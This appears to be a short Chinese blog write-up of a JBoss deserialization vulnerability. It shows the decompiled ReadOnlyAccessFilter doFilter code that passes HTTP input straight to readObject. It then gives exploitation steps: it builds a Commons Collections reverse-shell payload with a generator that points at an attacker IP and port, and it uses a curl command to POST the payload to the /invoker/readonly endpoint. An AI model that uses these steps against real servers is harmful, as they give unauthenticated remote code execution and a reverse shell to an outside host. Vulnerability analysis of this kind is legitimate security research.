Jboss反序列化分析

这个反序列化漏洞在server/all/deploy/httpha-invoker.sar/invoker.war/WEB-INF/classes/org/jboss/invocation/http/servlet/ReadOnlyAccessFilter.class中，
先用jad反编译,会生成同名.jad文件，其实就是.java
jad ReadOnlyAccessFilter.class
其中的doFiter方法中，直接将httprequest的数据写入ois中，然后直接readObject，是非常典型的反序列化漏洞。

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
        throws IOException, ServletException
    {
        HttpServletRequest httpRequest = (HttpServletRequest)request;
        java.security.Principal user = httpRequest.getUserPrincipal();
        if(user == null && readOnlyContext != null)
        {
            javax.servlet.ServletInputStream sis = request.getInputStream();
            ObjectInputStream ois = new ObjectInputStream(sis);
            MarshalledInvocation mi = null;
            try
            {
                mi = (MarshalledInvocation)ois.readObject();
            }
            catch(ClassNotFoundException e)
            {
                throw new ServletException("Failed to read MarshalledInvocation", e);
            }
            request.setAttribute("MarshalledInvocation", mi);
            mi.setMethodMap(namingMethodMap);
            Method m = mi.getMethod();
            if(m != null)
                validateAccess(m, mi);
        }
        chain.doFilter(request, response);
    }

然后再用JavaDeserH2HC测试下这个漏洞

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.21.1:1234

会在当前路径生成ReverseShellCommonsCollectionsHashMap.ser，再将数据post过去即可。
curl http://192.168.21.128:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

image.png